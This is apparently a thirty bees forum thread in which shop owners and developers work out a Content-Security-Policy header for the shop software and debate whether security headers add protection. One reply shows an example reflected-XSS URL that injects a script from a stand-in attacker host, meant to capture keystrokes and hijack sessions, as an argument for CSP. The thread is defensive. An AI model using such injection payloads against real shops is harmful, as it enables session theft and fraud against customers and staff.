
Content security policy for TB


Raymond


Hello

I am working on my server to get a high rating for SSL and headers. So far I have enabled TLS 1.2 and 1.3, disabled TLS 1.0 and 1.1, and added a number of headers to avoid a low security grade: X-Frame-Options, X-Content-Type-Options, Content-Security-Policy, Referrer-Policy, Permissions-Policy, Strict-Transport-Security.

For the Content-Security-Policy header, aka CSP, I set a very permissive rule set which allows practically everything, so it is not really effective; however, having it is still better than not having it at all:

Header always set Content-Security-Policy "default-src 'self';  font-src *; frame-src *; img-src * data:; media-src * data:; object-src *; script-src * 'unsafe-inline' 'unsafe-eval'; style-src * 'unsafe-inline';"

With this CSP rule almost everything works fine, but I would like to start building a proper rule set for thirty bees, not only to score higher on security policies with crawlers and scanners, but also to effectively harden the security of the shop.

As far as TB itself is concerned, what would be the minimum rule set needed to avoid problems?

E.g. in a TB 1.2 installation I am testing, even with the rule set posted above, the core updater runs into a problem:

==================

Version to compare to:

request failed, see JavaScript console

The dropdown menu does not work, so it is not possible to choose a version; in the JavaScript console I read this:

Content Security Policy: a resource on https://api.thirtybees.com/coreupdater/master.php was blocked by the configuration of the page (“default-src”).  jquery-1.11.0.min.js:4:25949

Request to https://api.thirtybees.com/coreupdater/master.php failed with status 'rejected'. controller.js:102:15

==================

So even with such a liberal rule set some functionality is broken. Of course, for emergencies it is always possible to remove the CSP string from httpd.conf, restart Apache, do the update, put the string back in httpd.conf and restart Apache again. But how much better would it be to know the magic string that allows TB to work fine while keeping an extra protection layer on the website?

I think defining a CSP for at least the TB core and native modules is of common interest to every merchant/developer. I am not expert enough to do it all by myself, but I am pretty confident it can be done together here in the forum.

My idea is to remove the unsafe rules one at a time, check what happens in the debug console, and add the appropriate rules to keep everything working right.

E.g. the rejected request above does not match any of the specific rules, so it falls back to default-src 'self';

I imagine that adding the domain api.thirtybees.com will solve the problem, but with which syntax should it be added?

Should it be added to the default-src rule? Or is it better to add a specific rule for this kind of request?
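If I understand the CSP spec correctly, background XHR/fetch calls like the one the core updater makes are governed by the connect-src directive, which falls back to default-src when it is not declared. So a sketch like this (untested, assuming Apache with mod_headers, otherwise identical to the permissive rule above) might be enough to unblock it:

# Untested sketch: allow XHR calls to the thirty bees API via connect-src
Header always set Content-Security-Policy "default-src 'self'; connect-src 'self' https://api.thirtybees.com; font-src *; frame-src *; img-src * data:; media-src * data:; object-src *; script-src * 'unsafe-inline' 'unsafe-eval'; style-src * 'unsafe-inline';"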

Anyone interested in creating "the perfect CSP" string for TB, please join this "quest".

The main goal is to have a CSP string that allows the TB core and native modules to work without problems while blocking everything else, so as to harden the shop installation. If people then want to add more rules to get third-party modules and other things working, those can be listed as extras.

By the way, while searching for a way to solve this task I stumbled upon a WordPress module that automatically reports the blocked requests after a basic restrictive CSP header is introduced on the server, and then outputs the formatted CSP string needed to have everything working right. I think a native module of this kind would be interesting for TB; I will also add this proposal to the "feature request time" topic.
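As far as I can tell, the same "report first, then tighten" workflow can be prototyped with a plain header, because CSP has a report-only variant that logs violations in the browser console (and optionally sends them to a reporting endpoint) without blocking anything. A sketch, assuming Apache with mod_headers; the /csp-report path is just a hypothetical placeholder for whatever endpoint would collect the reports:

# Report-only sketch: nothing is blocked, violations are only reported
Header always set Content-Security-Policy-Report-Only "default-src 'self'; report-uri /csp-report"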

P.S.: the website I used to check the headers is this one: https://securityheaders.com

I checked what the big players do and, surprisingly, not many implement all the suggested headers; some do not implement the CSP header at all.

I do not really know how much this affects a website in non-security matters, e.g. ranking; obviously the big players are a case apart and are favoured no matter what. However, I think that in general having these headers set up is better than not having them.

I used this website to check SSL: https://www.ssllabs.com/ssltest/analyze.html

While a website can get an A or even A+ mark for SSL, if proper headers are not adopted as well there are still many ways to exploit it. I read some comments saying that these headers are important and that the SSL test alone is incomplete, giving false reassurance if it is not carried out together with a headers test.

I would like to know more about this; what is your opinion in this respect?

Thank you

Best regards

R.

 


The problem with CORS requests to api.thirtybees.com will be resolved with the new version of Core Updater that will be released later this week. AJAX calls to the API server were removed and replaced with server-to-server communication, so this particular problem will go away.

Please report any additional issues you find! Thank you


Setting headers doesn't improve the security of a server. A browser can respect these settings; a malicious visitor would simply ignore them. To test server security, there are scripts like testssl.sh: https://testssl.sh/. Don't forget to turn off UFW DoS protection and Fail2Ban while testing; testssl.sh triggers them.

That said, these CORS requests for Core Updater still work.


27 minutes ago, Traumflug said:

Setting headers doesn't improve the security of a server. A browser can respect these settings; a malicious visitor would simply ignore them.

Of course they improve security. They wouldn't exist otherwise. They are not intended to stop attackers interacting with the server directly, of course. But they are very useful for preventing cross-site scripting, script injection, and similar attacks.

Example scenario:

An attacker figures out that some query parameter on your server, say "&id_order=1", is displayed in the page without escaping or validation. The attacker can then craft a URL to your server with this parameter containing JavaScript, something like this:

http://yourdomain.com/some/page?id_order%3D%3Cscript%20src%3D%22https%3A//attacker.site/malicious_script.js%22%3E

 This will insert 

<script src="https://attacker.site/malicious_script.js" />

into the page. And that's bad. The script can now do various things: listen to keystrokes to capture your customer's password, submit AJAX requests to place orders on their behalf, or use the contact form to send spam emails. And who knows what else.

By setting a proper CSP on the server, this problem can be mitigated to some extent. With strict CSP rules, browsers (the well-behaved ones) will block this injection, and the user won't be affected.
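For illustration, a strict policy along these lines (just a sketch, assuming Apache with mod_headers) would make a compliant browser refuse to load the injected script, since attacker.site is not an allowed script source and inline scripts are not allowed either:

# Sketch: only same-origin scripts may load, so the injected
# https://attacker.site/malicious_script.js is refused by the browser
Header always set Content-Security-Policy "default-src 'self'; script-src 'self'; object-src 'none'"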

Of course, all such security holes must be fixed in the thirty bees code. But we can never be sure we have fixed them all; we probably never will. Thus, having a strict CSP would definitely help.


2 hours ago, datakick said:

Of course they improve security. They wouldn't exist otherwise. They are not intended to stop attackers interacting with the server directly, of course.

If hackers can work around a security measure by simply accessing the server directly, this measure is pointless. Maybe that's why I don't care much about such headers and turn my attention to the safety of the code instead.

That said, if these headers don't get in the way, it's fine to add them. That's not too easy, though, because modules have a tendency to grab resources from just about everywhere: fonts, images, icons; some even call home.


6 minutes ago, Traumflug said:

If hackers can work around a security measure by simply accessing the server directly, this measure is pointless. Maybe that's why I don't care much about such headers and turn my attention to the safety of the code instead.

You apparently don't understand how an XSS attack works. It's not the attacker who interacts with the server, it's a third-party user. If the attacker somehow manages to inject JavaScript into a page that is rendered for a different user, he can steal that user's session and do whatever he wants on behalf of that poor user. This can be done, for example, by posting an exploit link on a public forum, or by sending the link directly via email to a known user of the server. Once the user clicks on the link, the attacker gains access to his identity / session / cookies.

This problem is much more severe in the back office, where the attacker can act as an employee. They can trigger AJAX calls to approve or create orders, change product pricing, create a new employee, or whatnot. At that point it is just a series of well-formed HTTP requests; they can perform the same operations the employee can. That's why a store owner should never (or rarely) use the admin profile. They should create and use a profile with limited permissions to mitigate the risks.

In the front office XSS is not as big a deal, but it is still a serious problem. The attacker can impersonate the customer, and that can lead to real damage. For example, I can imagine a script that posts a message via the contact form asking to ship the last order to a different address. The shop owner will, of course, believe this message, because it came from a logged-in customer, and they will send the goods to the different address.

This is a real problem, and CSP can help a lot. It's not a silver bullet, of course, but nothing is.


Of course I know how XSS works.

24 minutes ago, datakick said:

If the attacker somehow manages to inject JavaScript into a page that is rendered for a different user [...]

This "somehow manages" simply must not happen. Neither originating from a browser, nor originating from elsewhere.


Just now, Traumflug said:

This "somehow manages" simply must not happen. Neither originating from a browser, nor originating from elsewhere.

🙂

It happens all the time. And it will continue to happen. It's just not possible to close all the holes in the core, the themes, all the native or third-party modules, or any third-party software that can be installed alongside.


Hello

As far as I understand, the point is to mitigate what I think could be called a "third man in the middle" attack. Datakick's examples are pertinent and self-explanatory: using these headers, and CSP in particular, makes such attacks more difficult.

From a non-expert point of view like mine, it seems quite clear and logical that instructing the server and the browser not to accept "things" coming from sources that are not expressly declared as legitimate considerably reduces the possibility for anyone to inject instructions on the fly, divert the client toward a malicious server and feed it deceptive data, or vice versa.

I understand that the use of these headers makes the work of the developer/implementer/merchant more difficult and also more costly. However, while it is of course always good in principle to try to patch everything in the software you use, it is just as good in principle to harden everything that interacts with that software. Hardening the way client-server communication happens is therefore simply logical and better practice.

As a matter of fact, 100% security is perhaps never achievable, but the harder it is to get around the security measures, the better the chances that an attacker fails. So why not at least implement everything that is reasonably possible?

The CSP rule I set is extra permissive. I also use mod_security with WAF rules from Comodo, and at the moment almost everything seems to work well. I need to study this further and will report my findings here. Anyone interested, please join this initiative; it would be very good to find the proper "recipe" for a good CSP policy that works fine with TB.

Thank you

Best regards


  • 8 months later...

I was about to contact you about CSP and found this thread. Is the TB team working on this?

Using Mozilla Observatory, the best score I can get while keeping the front office and back office working is a B (screenshots attached).

A first (easy, I hope) step to let users set a stronger CSP would be to stop using any inline scripts and CSS (see the sketch below).

Another is implementing some Subresource Integrity.
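To illustrate that first step: once the theme and modules emit no inline scripts or styles, the 'unsafe-inline' keywords can be dropped entirely, something along these lines (a sketch, assuming Apache with mod_headers; any leftover inline snippets would have to be whitelisted with nonces or hashes instead):

# Sketch of a policy without 'unsafe-inline': only same-origin scripts and styles
Header always set Content-Security-Policy "default-src 'self'; script-src 'self'; style-src 'self'; img-src 'self' data:"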

Attachments: csp_details.png, test_results.png


7 minutes ago, nickz said:

The more you throttle your shop the less speed and visitors you'll have.

I'm very sure that one more HTTP header in the response will not have any measurable impact on store speed. It can have a huge (positive) impact on store security, though.

 

 

